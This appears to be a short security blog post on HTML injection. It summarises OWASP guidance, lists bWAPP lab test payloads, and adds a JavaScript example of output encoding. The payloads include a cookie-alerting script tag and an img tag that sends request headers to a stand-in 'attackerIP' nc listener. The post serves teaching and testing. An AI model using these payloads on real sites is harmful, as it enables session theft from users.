OWASP: HTML Injection

Summary

  HTML injection is a type of injection issue that occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page. This vulnerability can have many consequences, like disclosure of a user's session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims.

  This vulnerability occurs when the user input is not correctly sanitized and the output is not encoded. An injection allows the attacker to send a malicious HTML page to a victim. The targeted browser will not be able to distinguish (trust) the legitimate from the malicious parts and consequently will parse and execute all as legitimate in the victim context.

How to Test

  There is a wide range of methods and attributes that could be used to render HTML content. If these methods are provided with an untrusted input, then there is a high risk of XSS, specifically an HTML injection one. Malicious HTML code could be injected for example via innerHTML, which is used to render user-inserted HTML code. If strings are not correctly sanitized the problem could lead to XSS-based HTML injection. Another method could be document.write().

Testing in bWAPP


Enter HTML code: <h1><b><u>Click Me ! Boy</u></b></h1>

Enter a script: <script>alert(document.cookie)</script>

Bounce the request headers to an nc listener: <img src="http://attackerIP/blah">
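The fix the Summary calls for is output encoding. The following is an added example, not code from the original post or from bWAPP: it renders the vulnerable pattern (a parameter concatenated into the page) beside the encoded version, using the three constructed payloads above, and counts how many tags a browser would parse from each result. All function names are hypothetical.

```javascript
// Added example (not from the original post): output encoding applied to the
// bWAPP HTML-injection payloads above. Function names are hypothetical.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode untrusted text for an HTML body or quoted-attribute context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the parameter is concatenated into the page unencoded,
// so any tags in it are parsed as markup by the victim's browser.
function renderUnsafe(firstName) {
  return `<p>Welcome ${firstName}</p>`;
}

// Fixed pattern: same template, but the untrusted value is encoded first.
function renderSafe(firstName) {
  return `<p>Welcome ${escapeHtml(firstName)}</p>`;
}

// DOM-side equivalent: write untrusted strings with textContent, never with
// innerHTML or document.write(). `el` is any object with a textContent
// property (a real Element in the browser; a plain object in the test).
function setUntrustedText(el, value) {
  el.textContent = String(value);
  return el;
}

// Count the HTML tags a browser would parse out of a rendered fragment.
// Used as a cheap regression check that encoding removed injected markup.
function countTags(html) {
  return (html.match(/<\/?[a-zA-Z][^>]*>/g) || []).length;
}

// Constructed inputs, taken from the test payloads in the post.
const PAYLOADS = [
  '<h1><b><u>Click Me ! Boy</u></b></h1>',
  '<script>alert(document.cookie)</script>',
  '<img src="http://attackerIP/blah">',
];

// Unsafe rendering keeps every injected tag; safe rendering keeps only the
// template's own <p>...</p> pair.
function demo() {
  return PAYLOADS.map((p) => ({
    payload: p,
    unsafeTags: countTags(renderUnsafe(p)),
    safeTags: countTags(renderSafe(p)),
  }));
}
```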

Off to cram nc; more exploitation examples will be added later....

Posted: 2024-08-30 01:09:16
